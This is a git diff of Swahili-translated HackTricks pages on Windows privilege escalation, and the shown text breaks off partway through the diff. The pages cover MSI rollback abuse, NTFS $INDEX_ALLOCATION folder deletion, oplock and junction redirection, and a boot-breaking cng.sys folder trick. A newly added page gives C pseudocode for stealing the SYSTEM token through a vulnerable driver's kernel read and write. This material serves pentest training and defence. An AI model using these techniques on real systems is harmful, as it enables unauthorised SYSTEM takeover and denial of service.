`C:\Config.Msi` hadi `.rbs` mpya itaonekana. +- Rekodi jina lake. -- Hatua ya 9: Usawazisha Kabla ya Kurejesha -- `.msi` ina **kitendo cha usakinishaji cha kawaida (`SyncBeforeRollback`)** ambacho: -- Kinatoa ishara ya tukio wakati `.rbs` inaundwa. +- Step 9: Sync Before Rollback +- `.msi` ina **custom install action (`SyncBeforeRollback`)** ambayo: +- Inatuma ishara (signals) wakati `.rbs` imetengenezwa. - Kisha **inasubiri** kabla ya kuendelea. -- Hatua ya 10: Rudisha ACL dhaifu +- Step 10: Reapply Weak ACL - Baada ya kupokea tukio la `.rbs created`: - Windows Installer **inarudisha ACL kali** kwa `C:\Config.Msi`. -- Lakini kwa sababu bado una handle na `WRITE_DAC`, unaweza **kurudisha ACL dhaifu** tena. +- Lakini kwa kuwa bado una handle yenye `WRITE_DAC`, unaweza **kurejesha ACL dhaifu** tena. -> ACL zina **imarishwa tu wakati handle imefunguliwa**, hivyo unaweza bado kuandika kwenye folda. +> ACLs zinafanywa tu wakati handle inafunguliwa, hivyo bado unaweza kuandika kwenye folda. -- Hatua ya 11: Angusha `.rbs` bandia na `.rbf` -- Badilisha faili ya `.rbs` na **skripti ya kurejesha bandia** inayosema kwa Windows: -- Rejesha faili yako ya `.rbf` (DLL mbaya) katika **mahali pa kipaumbele** (mfano, `C:\Program Files\Common Files\microsoft shared\ink\HID.DLL`). -- Angusha `.rbf` yako bandia yenye **mzigo mbaya wa DLL wa kiwango cha SYSTEM**. +- Step 11: Drop Fake `.rbs` and `.rbf` +- Andika upya faili `.rbs` na script bandia ya rollback ambayo inaelekeza Windows: +- Kuirejesha `.rbf` yako (DLL yenye madhara) katika **mahali lenye ruhusa za juu** (mfano, `C:\Program Files\Common Files\microsoft shared\ink\HID.DLL`). +- Weka `.rbf` bandia inaobeba **DLL yenye payload ya SYSTEM**. -- Hatua ya 12: Sababisha Kurejesha -- Toa ishara ya tukio la usawazishaji ili msanidi arudi. -- **Kitendo cha kawaida cha aina 19 (`ErrorOut`)** kimewekwa ili **kushindwa kwa kusudi kwa usakinishaji** katika sehemu inayojulikana. -- Hii inasababisha **kurejesha kuanza**. +- Step 12: Trigger the Rollback +- Tuma ishara ya sync ili installer iendelee. +- Custom action ya aina 19 (`ErrorOut`) imesanidiwa kushindwa kwa hiari katika hatua inayojulikana. +- Hii inasababisha **rollback kuanza**. -- Hatua ya 13: SYSTEM Inasakinisha DLL Yako +- Step 13: SYSTEM Installs Your DLL - Windows Installer: -- Inasoma `.rbs` yako mbaya. -- Inakopya DLL yako ya `.rbf` katika mahali pa lengo. -- Sasa una **DLL yako mbaya katika njia iliyo loaded na SYSTEM**. +- Inasoma `.rbs` yako yenye madhara. +- Inakopa DLL yako ya `.rbf` hadi mahali lengwa. +- Sasa una **DLL yako yenye madhara katika njia inayopakiwa na SYSTEM**. -- Hatua ya Mwisho: Teua Msimbo wa SYSTEM -- Kimbia **binary ya kujiinua yenye kuaminika** (mfano, `osk.exe`) inayopakia DLL uliyoiingilia. -- **Boom**: Msimbo wako unatekelezwa **kama SYSTEM**. +- Final Step: Execute SYSTEM Code +- Endesha binary ya kuaminika yenye auto-elevation (mfano, `osk.exe`) ambayo inapakia DLL uliyohijack. +- **Boom**: Code yako inatekelezwa **kwa SYSTEM**. -### Kutoka kwa Kuondoa/Kuhamasisha/Kubadilisha Faili ya Kichaguliwa hadi SYSTEM EoP +### Kutoka Arbitrary File Delete/Move/Rename hadi SYSTEM EoP -Tekniki kuu ya kurejesha MSI (ile ya awali) inadhani unaweza kufuta **folda nzima** (mfano, `C:\Config.Msi`). Lakini je, ni vipi ikiwa udhaifu wako unaruhusu tu **kuondoa faili za kichaguliwa**? +Mbinu kuu ya rollback ya MSI (iliyotangulia) inadhani unaweza kufuta **folda nzima** (mfano, `C:\Config.Msi`). Lakini vipi ikiwa udhaifu wako unaruhusu tu **ufutaji wa faili yoyote**? -Unaweza kutumia **NTFS internals**: kila folda ina mtiririko wa data mbadala uliofichwa unaoitwa: +Unaweza kutekeleza exploit kwa kutumia **NDANI za NTFS**: kila folda ina alternate data stream iliyofichwa inayoitwa: ``` C:\SomeFolder::$INDEX_ALLOCATION ``` -Hii stream inahifadhi **metadata ya index** ya folda. +Mtiririko huu unahifadhi **index metadata** ya folda. -Hivyo, ikiwa **unafuta stream ya `::$INDEX_ALLOCATION`** ya folda, NTFS **inaondoa folda nzima** kutoka kwa mfumo wa faili. +Kwa hivyo, ikiwa utafuta **mtiririko wa `::$INDEX_ALLOCATION`** wa folda, NTFS **itaondoa folda nzima** kutoka kwenye mfumo wa faili. -Unaweza kufanya hivi kwa kutumia APIs za kawaida za kufuta faili kama: +Unaweza kufanya hivyo kwa kutumia APIs za kawaida za kufuta faili kama: ```c DeleteFileW(L"C:\\Config.Msi::$INDEX_ALLOCATION"); ``` -> Ingawa unaita *file* delete API, in **afuta folda yenyewe**. +> Ingawa ukiita *file* delete API, **inafuta folda yenyewe**. -### Kutoka kwa Kufuta Maudhui ya Folda hadi SYSTEM EoP -Je, ni nini kitatokea ikiwa primitive yako haitakuruhusu kufuta faili/folda za kawaida, lakini **inaruhusu kufutwa kwa *maudhui* ya folda inayodhibitiwa na mshambuliaji**? +### Kutoka Kuifuta Yaliyomo Kwenye Folda hadi SYSTEM EoP +Je, vipi ikiwa primitive yako haikuwezesha kufuta arbitrary files/folders, lakini **inawezesha deletion ya *contents* ya attacker-controlled folder**? -1. Hatua ya 1: Weka folda na faili ya mtego -- Unda: `C:\temp\folder1` -- Ndani yake: `C:\temp\folder1\file1.txt` +1. Hatua 1: Tengeneza folda ya mtego na file +- Create: `C:\temp\folder1` +- Inside it: `C:\temp\folder1\file1.txt` -2. Hatua ya 2: Weka **oplock** kwenye `file1.txt` -- Oplock **inasimamisha utekelezaji** wakati mchakato wenye mamlaka unajaribu kufuta `file1.txt`. +2. Hatua 2: Weka an **oplock** kwenye `file1.txt` +- Oplock hiyo **inasimamisha utekelezaji** wakati privileged process inapo jaribu kufuta `file1.txt`. ```c // pseudo-code RequestOplock("C:\\temp\\folder1\\file1.txt"); WaitForDeleteToTriggerOplock(); ``` -3. Hatua ya 3: Trigger mchakato wa SYSTEM (kwa mfano, `SilentCleanup`) -- Mchakato huu unachunguza folda (kwa mfano, `%TEMP%`) na kujaribu kufuta maudhui yao. -- Wakati inafikia `file1.txt`, **oplock inasababisha** na inachukua udhibiti kwa callback yako. +3. Hatua 3: Chochea mchakato wa SYSTEM (kwa mfano, `SilentCleanup`) +- Mchakato huu unachanganua folda (kwa mfano, `%TEMP%`) na kujaribu kufuta yaliyomo ndani yake. +- Wakati inafika `file1.txt`, **oplock triggers** na inampatia callback yako udhibiti. -4. Hatua ya 4: Ndani ya callback ya oplock – elekeza ufutaji +4. Hatua 4: Ndani ya oplock callback – elekeza upya ufutaji - Chaguo A: Hamisha `file1.txt` mahali pengine - Hii inafanya `folder1` kuwa tupu bila kuvunja oplock. @@ -1479,76 +1492,76 @@ mklink /J C:\temp\folder1 \\?\GLOBALROOT\RPC Control # Make file1.txt point to a sensitive folder stream CreateSymlink("\\RPC Control\\file1.txt", "C:\\Config.Msi::$INDEX_ALLOCATION") ``` -> Hii inalenga mtiririko wa ndani wa NTFS ambao huhifadhi metadata ya folda — kuifuta kunafuta folda. +> Hii inalenga stream ya ndani ya NTFS inayohifadhi metadata ya folda — kuifuta kwake kunafuta folda. -5. Hatua ya 5: Achilia oplock -- Mchakato wa SYSTEM unaendelea na kujaribu kufuta `file1.txt`. -- Lakini sasa, kutokana na junction + symlink, inafuta kweli: +5. Hatua 5: Kuachilia oplock +- Mchakato wa SYSTEM unaendelea na unajaribu kufuta `file1.txt`. +- Lakini sasa, kutokana na junction + symlink, kwa kweli inafuta: ``` C:\Config.Msi::$INDEX_ALLOCATION ``` **Matokeo**: `C:\Config.Msi` imefutwa na SYSTEM. -### Kutoka Kwenye Folda Isiyo na Mpangilio Kuunda DoS ya Kudumu +### Kutoka Kuunda Folda ya Nasibu hadi DoS ya Kudumu -Tumia udhaifu ambao unakuwezesha **kuunda folda isiyo na mpangilio kama SYSTEM/admin** — hata kama **huwezi kuandika faili** au **kweka ruhusa dhaifu**. +Exploit a primitive that lets you **kuunda folda yoyote kama SYSTEM/admin** — hata kama **huwezi kuandika faili** au **kuweka ruhusa dhaifu**. -Unda **folda** (sio faili) yenye jina la **dereva muhimu wa Windows**, e.g.: +Unda **folda** (si faili) yenye jina la **critical Windows driver**, e.g.: ``` C:\Windows\System32\cng.sys ``` -- Hii njia kawaida inahusiana na dereva wa `cng.sys` wa hali ya kernel. -- Ikiwa **utaunda kabla kama folda**, Windows inashindwa kupakia dereva halisi wakati wa kuanzisha. -- Kisha, Windows inajaribu kupakia `cng.sys` wakati wa kuanzisha. -- Inaona folda, **inashindwa kutatua dereva halisi**, na **inashindwa au kusimamisha kuanzisha**. -- Hakuna **kurejea**, na **hakuna urejeleaji** bila uingiliaji wa nje (mfano, ukarabati wa kuanzisha au ufikiaji wa diski). +- Njia hii kawaida inalingana na `cng.sys` kernel-mode driver. +- Ikiwa **uiundia awali kama folda**, Windows itashindwa kupakia driver halisi wakati wa boot. +- Kisha, Windows inajaribu kupakia `cng.sys` wakati wa boot. +- Inaona folda, **inashindwa kutatua driver halisi**, na **inaanguka au kusitisha boot**. +- Hakuna **mbadala**, na hakuna **urejeshaji** bila uingiliaji wa nje (mf., ukarabati wa boot au upatikanaji wa diski). -## **Kutoka kwa Uaminifu wa Juu hadi Mfumo** +## **Kutoka High Integrity hadi SYSTEM** -### **Huduma Mpya** +### **Huduma mpya** -Ikiwa tayari unafanya kazi kwenye mchakato wa Uaminifu wa Juu, **njia ya SYSTEM** inaweza kuwa rahisi tu **kwa kuunda na kutekeleza huduma mpya**: +Ikiwa tayari unafanya kazi kwenye mchakato wa High Integrity, **njia hadi SYSTEM** inaweza kuwa rahisi kwa **kuunda na kutekeleza service mpya**: ``` sc create newservicename binPath= "C:\windows\system32\notepad.exe" sc start newservicename ``` > [!TIP] -> Wakati wa kuunda binary ya huduma hakikisha ni huduma halali au kwamba binary inatekeleza vitendo muhimu haraka kwani itauawa ndani ya sekunde 20 ikiwa si huduma halali. +> Wakati wa kuunda service binary hakikisha ni service halali au kwamba binary inafanya vitendo vinavyohitajika haraka kwani itauawa ndani ya sekunde 20 ikiwa sio service halali. ### AlwaysInstallElevated -Kutoka kwa mchakato wa High Integrity unaweza kujaribu **kuwezesha funguo za rejista za AlwaysInstallElevated** na **kufunga** shell ya kurudi kwa kutumia _**.msi**_ wrapper.\ -[Taarifa zaidi kuhusu funguo za rejista zinazohusika na jinsi ya kufunga pakiti ya _.msi_ hapa.](#alwaysinstallelevated) +Kutoka kwenye High Integrity process unaweza kujaribu **kuwasha AlwaysInstallElevated registry entries** na **kusakinisha** reverse shell ukitumia wrapper ya _**.msi**_.\ +[Taarifa zaidi kuhusu registry keys zinazohusika na jinsi ya kusakinisha kifurushi _.msi_ hapa.](#alwaysinstallelevated) -### High + SeImpersonate ruhusa kwa System +### High + SeImpersonate privilege to System -**Unaweza** [**kupata msimbo hapa**](seimpersonate-from-high-to-system.md)**.** +**Unaweza** [**kupata code hapa**](seimpersonate-from-high-to-system.md)**.** -### Kutoka SeDebug + SeImpersonate hadi Full Token ruhusa +### From SeDebug + SeImpersonate to Full Token privileges -Ikiwa una hizo ruhusa za tokeni (labda utaweza kuzipata katika mchakato wa High Integrity), utaweza **kufungua karibu mchakato wowote** (sio michakato iliyo na ulinzi) kwa ruhusa ya SeDebug, **kunakili tokeni** ya mchakato, na kuunda **mchakato wowote na tokeni hiyo**.\ -Kutumia mbinu hii kawaida **huchaguliwa mchakato wowote unaotembea kama SYSTEM na ruhusa zote za tokeni** (_ndiyo, unaweza kupata michakato ya SYSTEM bila ruhusa zote za tokeni_).\ -**Unaweza kupata** [**mfano wa msimbo unaotekeleza mbinu iliyopendekezwa hapa**](sedebug-+-seimpersonate-copy-token.md)**.** +Ikiwa una privileges hizo za token (kwa kawaida utazipata ndani ya mchakato uliopo tayari kuwa High Integrity), utaweza **kufungua karibu mchakato wowote** (sio protected processes) kwa kutumia SeDebug privilege, **kunakili token** ya mchakato, na kuunda **mchakato wowote unaotumia token hiyo**.\ +Kutumia mbinu hii kwa kawaida **huchagua mchakato wowote unaokimbia kama SYSTEM mwenye privileges zote za token** (_ndio, unaweza kupata SYSTEM processes bila privileges zote za token_).\ +**Unaweza kupata** [**mfano wa code unaotekeleza mbinu iliyopendekezwa hapa**](sedebug-+-seimpersonate-copy-token.md)**.** ### **Named Pipes** -Mbinu hii inatumika na meterpreter ili kupandisha hadhi katika `getsystem`. Mbinu hii inajumuisha **kuunda bomba na kisha kuunda/kutumia huduma kuandika kwenye bomba hilo**. Kisha, **server** iliyounda bomba hilo kwa kutumia ruhusa ya **`SeImpersonate`** itakuwa na uwezo wa **kujifanya kama tokeni** ya mteja wa bomba (huduma) ikipata ruhusa za SYSTEM.\ -Ikiwa unataka [**kujifunza zaidi kuhusu bomba za jina unapaswa kusoma hii**](#named-pipe-client-impersonation).\ -Ikiwa unataka kusoma mfano wa [**jinsi ya kutoka kwa high integrity hadi System kwa kutumia bomba za jina unapaswa kusoma hii**](from-high-integrity-to-system-with-name-pipes.md). +Mbinu hii inatumiwa na meterpreter kupanda hadhi katika `getsystem`. Mbinu inajumuisha **kuunda pipe na kisha kuunda/kuabusi service ili kuandika kwenye pipe hiyo**. Kisha, **server** iliyounda pipe kwa kutumia privilege ya **`SeImpersonate`** itakuwa na uwezo wa **kuiga token** ya mteja wa pipe (service) na kupata privileges za SYSTEM.\ +Ikiwa unataka [**kujifunza zaidi kuhusu name pipes unasome hii**](#named-pipe-client-impersonation).\ +Ikiwa unataka kusoma mfano wa [**jinsi ya kutoka high integrity hadi System ukitumia name pipes soma hii**](from-high-integrity-to-system-with-name-pipes.md). ### Dll Hijacking -Ikiwa unafanikiwa **kudhibiti dll** inayopakiwa na **mchakato** unaotembea kama **SYSTEM** utaweza kutekeleza msimbo wowote na ruhusa hizo. Hivyo basi Dll Hijacking pia ni muhimu kwa aina hii ya kupandisha hadhi, na zaidi, ikiwa ni **rahisi zaidi kufikia kutoka kwa mchakato wa high integrity** kwani itakuwa na **ruhusa za kuandika** kwenye folda zinazotumika kupakia dlls.\ +Ikiwa utafanikiwa **hijack a dll** inayopakiwa na **mchakato** unaokimbia kama **SYSTEM** utaweza kutekeleza code yoyote kwa idhini hizo. Kwa hivyo Dll Hijacking pia ni muhimu kwa aina hii ya kupandisha hadhi, na, zaidi ya hayo, ni **rahisi zaidi kufikiwa kutoka kwenye High Integrity process** kwani itakuwa na **write permissions** kwenye folders zinazotumika kupakia dlls.\ **Unaweza** [**kujifunza zaidi kuhusu Dll hijacking hapa**](dll-hijacking/index.html)**.** -### **Kutoka kwa Administrator au Network Service hadi System** +### **From Administrator or Network Service to System** - [https://github.com/sailay1996/RpcSsImpersonator](https://github.com/sailay1996/RpcSsImpersonator) - [https://decoder.cloud/2020/05/04/from-network-service-to-system/](https://decoder.cloud/2020/05/04/from-network-service-to-system/) - [https://github.com/decoder-it/NetworkServiceExploit](https://github.com/decoder-it/NetworkServiceExploit) -### Kutoka kwa LOCAL SERVICE au NETWORK SERVICE hadi ruhusa kamili +### From LOCAL SERVICE or NETWORK SERVICE to full privs **Soma:** [**https://github.com/itm4n/FullPowers**](https://github.com/itm4n/FullPowers) @@ -1558,45 +1571,45 @@ Ikiwa unafanikiwa **kudhibiti dll** inayopakiwa na **mchakato** unaotembea kama ## Zana muhimu -**Zana bora ya kutafuta mwelekeo wa kupandisha hadhi ya ndani ya Windows:** [**WinPEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS) +**Zana bora za kutafuta Windows local privilege escalation vectors:** [**WinPEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS) **PS** [**PrivescCheck**](https://github.com/itm4n/PrivescCheck)\ -[**PowerSploit-Privesc(PowerUP)**](https://github.com/PowerShellMafia/PowerSploit) **-- Angalia makosa ya usanidi na faili nyeti (**[**angalia hapa**](https://github.com/carlospolop/hacktricks/blob/master/windows/windows-local-privilege-escalation/broken-reference/README.md)**). Imegundulika.**\ -[**JAWS**](https://github.com/411Hall/JAWS) **-- Angalia makosa kadhaa ya usanidi na kukusanya taarifa (**[**angalia hapa**](https://github.com/carlospolop/hacktricks/blob/master/windows/windows-local-privilege-escalation/broken-reference/README.md)**).**\ -[**privesc** ](https://github.com/enjoiz/Privesc)**-- Angalia makosa ya usanidi**\ -[**SessionGopher**](https://github.com/Arvanaghi/SessionGopher) **-- Inatoa taarifa za kikao zilizohifadhiwa za PuTTY, WinSCP, SuperPuTTY, FileZilla, na RDP. Tumia -Thorough katika eneo la ndani.**\ -[**Invoke-WCMDump**](https://github.com/peewpw/Invoke-WCMDump) **-- Inatoa akidi kutoka kwa Meneja wa Akidi. Imegundulika.**\ -[**DomainPasswordSpray**](https://github.com/dafthack/DomainPasswordSpray) **-- Piga maneno ya siri yaliyokusanywa kwenye kikoa**\ -[**Inveigh**](https://github.com/Kevin-Robertson/Inveigh) **-- Inveigh ni zana ya PowerShell ADIDNS/LLMNR/mDNS/NBNS spoofer na man-in-the-middle.**\ -[**WindowsEnum**](https://github.com/absolomb/WindowsEnum/blob/master/WindowsEnum.ps1) **-- Uainishaji wa msingi wa privesc Windows**\ -[~~**Sherlock**~~](https://github.com/rasta-mouse/Sherlock) **\~\~**\~\~ -- Tafuta udhaifu wa privesc uliojulikana (IMEFUTWA kwa Watson)\ -[~~**WINspect**~~](https://github.com/A-mIn3/WINspect) -- Ukaguzi wa ndani **(Inahitaji haki za Admin)** +[**PowerSploit-Privesc(PowerUP)**](https://github.com/PowerShellMafia/PowerSploit) **-- Angalia misconfigurations na faili nyeti (**[**angalia hapa**](https://github.com/carlospolop/hacktricks/blob/master/windows/windows-local-privilege-escalation/broken-reference/README.md)**). Imegunduliwa.**\ +[**JAWS**](https://github.com/411Hall/JAWS) **-- Angalia baadhi ya misconfigurations na kukusanya taarifa (**[**angalia hapa**](https://github.com/carlospolop/hacktricks/blob/master/windows/windows-local-privilege-escalation/broken-reference/README.md)**).**\ +[**privesc** ](https://github.com/enjoiz/Privesc)**-- Angalia misconfigurations**\ +[**SessionGopher**](https://github.com/Arvanaghi/SessionGopher) **-- Hutoa taarifa za vikao vilivyohifadhiwa vya PuTTY, WinSCP, SuperPuTTY, FileZilla, na RDP. Tumia -Thorough kwa lokaal.**\ +[**Invoke-WCMDump**](https://github.com/peewpw/Invoke-WCMDump) **-- Hutoa credentials kutoka Credential Manager. Imegunduliwa.**\ +[**DomainPasswordSpray**](https://github.com/dafthack/DomainPasswordSpray) **-- Fanya spray ya nywila zilizokusanywa kwenye domain**\ +[**Inveigh**](https://github.com/Kevin-Robertson/Inveigh) **-- Inveigh ni PowerShell ADIDNS/LLMNR/mDNS/NBNS spoofer na zana ya man-in-the-middle.**\ +[**WindowsEnum**](https://github.com/absolomb/WindowsEnum/blob/master/WindowsEnum.ps1) **-- Orodhesha kwa msingi kwa ajili ya privesc Windows**\ +[~~**Sherlock**~~](https://github.com/rasta-mouse/Sherlock) **\~\~**\~\~ -- Tafuta privesc vulnerabilities zinazojuikana (IMEACHWA kwa Watson)\ +[~~**WINspect**~~](https://github.com/A-mIn3/WINspect) -- Ukaguzi wa lokal **(Inahitaji haki za Admin)** **Exe** -[**Watson**](https://github.com/rasta-mouse/Watson) -- Tafuta udhaifu wa privesc uliojulikana (inahitaji kukusanywa kwa kutumia VisualStudio) ([**imekusanywa mapema**](https://github.com/carlospolop/winPE/tree/master/binaries/watson))\ -[**SeatBelt**](https://github.com/GhostPack/Seatbelt) -- Inatafuta mwenyeji akitafuta makosa ya usanidi (zaidi ni zana ya kukusanya taarifa kuliko privesc) (inahitaji kukusanywa) **(**[**imekusanywa mapema**](https://github.com/carlospolop/winPE/tree/master/binaries/seatbelt)**)**\ -[**LaZagne**](https://github.com/AlessandroZ/LaZagne) **-- Inatoa akidi kutoka kwa programu nyingi (exe iliyokusanywa mapema katika github)**\ +[**Watson**](https://github.com/rasta-mouse/Watson) -- Tafuta privesc vulnerabilities zinazojuikana (inahitaji kujengwa kwa kutumia VisualStudio) ([**precompiled**](https://github.com/carlospolop/winPE/tree/master/binaries/watson))\ +[**SeatBelt**](https://github.com/GhostPack/Seatbelt) -- Orodhesha host akitafuta misconfigurations (zaidi ni zana ya kukusanya taarifa kuliko privesc) (inahitaji kujengwa) **(**[**precompiled**](https://github.com/carlospolop/winPE/tree/master/binaries/seatbelt)**)**\ +[**LaZagne**](https://github.com/AlessandroZ/LaZagne) **-- Hutoa credentials kutoka programu nyingi (exe imeprecompiled kwenye github)**\ [**SharpUP**](https://github.com/GhostPack/SharpUp) **-- Port ya PowerUp kwa C#**\ -[~~**Beroot**~~](https://github.com/AlessandroZ/BeRoot) **\~\~**\~\~ -- Angalia makosa ya usanidi (executable iliyokusanywa katika github). Haipendekezwi. Haifanyi kazi vizuri katika Win10.\ -[~~**Windows-Privesc-Check**~~](https://github.com/pentestmonkey/windows-privesc-check) -- Angalia makosa yanayoweza kutokea (exe kutoka python). Haipendekezwi. Haifanyi kazi vizuri katika Win10. +[~~**Beroot**~~](https://github.com/AlessandroZ/BeRoot) **\~\~**\~\~ -- Angalia misconfiguration (executable precompiled kwenye github). Haipendekezwi. Haifanyi kazi vizuri kwenye Win10.\ +[~~**Windows-Privesc-Check**~~](https://github.com/pentestmonkey/windows-privesc-check) -- Angalia misconfigurations zinazowezekana (exe kutoka python). Haipendekezwi. Haifanyi kazi vizuri kwenye Win10. **Bat** -[**winPEASbat** ](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS)-- Zana iliyoundwa kwa msingi wa chapisho hili (haitaji accesschk kufanya kazi vizuri lakini inaweza kuitumia). +[**winPEASbat** ](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS)-- Zana iliyotengenezwa kulingana na chapisho hili (haihitaji accesschk ili ifanye kazi vizuri lakini inaweza kuitumia). **Local** -[**Windows-Exploit-Suggester**](https://github.com/GDSSecurity/Windows-Exploit-Suggester) -- Inasoma matokeo ya **systeminfo** na inapendekeza exploits zinazofanya kazi (python ya ndani)\ -[**Windows Exploit Suggester Next Generation**](https://github.com/bitsadmin/wesng) -- Inasoma matokeo ya **systeminfo** na inapendekeza exploits zinazofanya kazi (python ya ndani) +[**Windows-Exploit-Suggester**](https://github.com/GDSSecurity/Windows-Exploit-Suggester) -- Inasoma output ya **systeminfo** na inapendekeza exploits zinazofanya kazi (python ya lokal)\ +[**Windows Exploit Suggester Next Generation**](https://github.com/bitsadmin/wesng) -- Inasoma output ya **systeminfo** na inapendekeza exploits zinazofanya kazi (python ya lokal) **Meterpreter** _multi/recon/local_exploit_suggestor_ -Lazima uunde mradi kwa kutumia toleo sahihi la .NET ([ona hii](https://rastamouse.me/2018/09/a-lesson-in-.net-framework-versions/)). Ili kuona toleo lililosakinishwa la .NET kwenye mwenyeji wa mwathirika unaweza kufanya: +Lazima ujenge project kwa kutumia toleo sahihi la .NET ([angalia hili](https://rastamouse.me/2018/09/a-lesson-in-.net-framework-versions/)). Ili kuona toleo la .NET lililosanidiwa kwenye host ya mwathirika unaweza kufanya: ``` C:\Windows\microsoft.net\framework\v4.0.30319\MSBuild.exe -version #Compile the code with the version given in "Build Engine version" line ``` @@ -1617,4 +1630,6 @@ C:\Windows\microsoft.net\framework\v4.0.30319\MSBuild.exe -version #Compile the - [http://it-ovid.blogspot.com/2012/02/windows-privilege-escalation.html](http://it-ovid.blogspot.com/2012/02/windows-privilege-escalation.html) - [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md#antivirus--detections](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md#antivirus--detections) +- [HTB Reaper: Format-string leak + stack BOF → VirtualAlloc ROP (RCE) and kernel token theft](https://0xdf.gitlab.io/2025/08/26/htb-reaper.html) + {{#include ../../banners/hacktricks-training.md}} diff --git a/src/windows-hardening/windows-local-privilege-escalation/arbitrary-kernel-rw-token-theft.md b/src/windows-hardening/windows-local-privilege-escalation/arbitrary-kernel-rw-token-theft.md new file mode 100644 index 000000000..4b5fbb453 --- /dev/null +++ b/src/windows-hardening/windows-local-privilege-escalation/arbitrary-kernel-rw-token-theft.md @@ -0,0 +1,122 @@ +# Windows kernel EoP: Token stealing with arbitrary kernel R/W + +{{#include ../../banners/hacktricks-training.md}} + +## Muhtasari + +Ikiwa driver dhaifu ina IOCTL inayomruhusu mshambuliaji primitives za arbitrary kernel read na/au write, kuinua haki hadi NT AUTHORITY\SYSTEM mara nyingi inaweza kufanikiwa kwa kuiba token ya SYSTEM. Mbinu hii inakopa pointer ya Token kutoka kwenye EPROCESS ya mchakato wa SYSTEM na kuiweka kwenye EPROCESS ya mchakato wako wa sasa. + +Kwa nini inafanya kazi: +- Kila mchakato una muundo wa EPROCESS ambao una (miongoni mwa sehemu nyingine) Token (kwa kweli EX_FAST_REF kuelekea kitu cha token). +- Mchakato wa SYSTEM (PID 4) una token yenye ruhusa zote zikiwa zimeteuliwa. +- Kubadilisha EPROCESS.Token ya mchakato wako wa sasa na pointer ya token ya SYSTEM hufanya mchakato wako uendelee kuendesha kama SYSTEM mara moja. + +> Offsets katika EPROCESS zinatofautiana kati ya matoleo ya Windows. Zidhibitio kwa njia ya dynamic (symbols) au tumia constants maalum kwa toleo. Pia kumbuka kuwa EPROCESS.Token ni EX_FAST_REF (bita 3 za chini ni flag za reference count). + +## Hatua za juu + +1) Pata base ya ntoskrnl.exe na tatua anwani ya PsInitialSystemProcess. +- Kutoka user mode, tumia NtQuerySystemInformation(SystemModuleInformation) au EnumDeviceDrivers kupata base za drivers zilizo load. +- Ongeza offset ya PsInitialSystemProcess (kutoka symbols/reversing) kwenye kernel base kupata anwani yake. +2) Soma pointer kwenye PsInitialSystemProcess → hii ni kernel pointer kuelekea EPROCESS ya SYSTEM. +3) Kutoka EPROCESS ya SYSTEM, soma UniqueProcessId na ActiveProcessLinks offsets ili kuvuka orodha ya double linked list ya miundo ya EPROCESS (ActiveProcessLinks.Flink/Blink) hadi utakapopata EPROCESS ambayo UniqueProcessId yake ni sawa na GetCurrentProcessId(). Hifadhi yote: +- EPROCESS_SYSTEM (kwa SYSTEM) +- EPROCESS_SELF (kwa mchakato wa sasa) +4) Soma thamani ya token ya SYSTEM: Token_SYS = *(EPROCESS_SYSTEM + TokenOffset). +- Futa bit 3 za chini: Token_SYS_masked = Token_SYS & ~0xF (kawaida ~0xF au ~0x7 kulingana na build; kwenye x64 bit 3 za chini zinatumika — mask 0xFFFFFFFFFFFFFFF8). +5) Chaguo A (kawaida): Hifadhi bit 3 za chini kutoka token yako ya sasa na ziweke kwenye pointer ya SYSTEM ili kuweka reference count iliyojengwa iwe thabiti. +- Token_ME = *(EPROCESS_SELF + TokenOffset) +- Token_NEW = (Token_SYS_masked | (Token_ME & 0x7)) +6) Andika Token_NEW kurudi ndani ya (EPROCESS_SELF + TokenOffset) kwa kutumia kernel write primitive yako. +7) Mchakato wako wa sasa sasa ni SYSTEM. Hiari anzisha cmd.exe mpya au powershell.exe kuthibitisha. + +## Pseudocode + +Chini ni skeleton inayotumia tu IOCTL mbili kutoka kwa driver dhaifu, mojawapo kwa 8-byte kernel read na mojawapo kwa 8-byte kernel write. Badilisha na interface ya driver yako. +```c +#include +#include +#include + +// Device + IOCTLs are driver-specific +#define DEV_PATH "\\\\.\\VulnDrv" +#define IOCTL_KREAD CTL_CODE(FILE_DEVICE_UNKNOWN, 0x801, METHOD_BUFFERED, FILE_ANY_ACCESS) +#define IOCTL_KWRITE CTL_CODE(FILE_DEVICE_UNKNOWN, 0x802, METHOD_BUFFERED, FILE_ANY_ACCESS) + +// Version-specific (examples only – resolve per build!) +static const uint32_t Off_EPROCESS_UniquePid = 0x448; // varies +static const uint32_t Off_EPROCESS_Token = 0x4b8; // varies +static const uint32_t Off_EPROCESS_ActiveLinks = 0x448 + 0x8; // often UniquePid+8, varies + +BOOL kread_qword(HANDLE h, uint64_t kaddr, uint64_t *out) { +struct { uint64_t addr; } in; struct { uint64_t val; } outb; DWORD ret; +in.addr = kaddr; return DeviceIoControl(h, IOCTL_KREAD, &in, sizeof(in), &outb, sizeof(outb), &ret, NULL) && (*out = outb.val, TRUE); +} +BOOL kwrite_qword(HANDLE h, uint64_t kaddr, uint64_t val) { +struct { uint64_t addr, val; } in; DWORD ret; +in.addr = kaddr; in.val = val; return DeviceIoControl(h, IOCTL_KWRITE, &in, sizeof(in), NULL, 0, &ret, NULL); +} + +// Get ntoskrnl base (one option) +uint64_t get_nt_base(void) { +LPVOID drivers[1024]; DWORD cbNeeded; +if (EnumDeviceDrivers(drivers, sizeof(drivers), &cbNeeded) && cbNeeded >= sizeof(LPVOID)) { +return (uint64_t)drivers[0]; // first is typically ntoskrnl +} +return 0; +} + +int main(void) { +HANDLE h = CreateFileA(DEV_PATH, GENERIC_READ|GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL); +if (h == INVALID_HANDLE_VALUE) return 1; + +// 1) Resolve PsInitialSystemProcess +uint64_t nt = get_nt_base(); +uint64_t PsInitialSystemProcess = nt + /*offset of symbol*/ 0xDEADBEEF; // resolve per build + +// 2) Read SYSTEM EPROCESS +uint64_t EPROC_SYS; kread_qword(h, PsInitialSystemProcess, &EPROC_SYS); + +// 3) Walk ActiveProcessLinks to find current EPROCESS +DWORD myPid = GetCurrentProcessId(); +uint64_t cur = 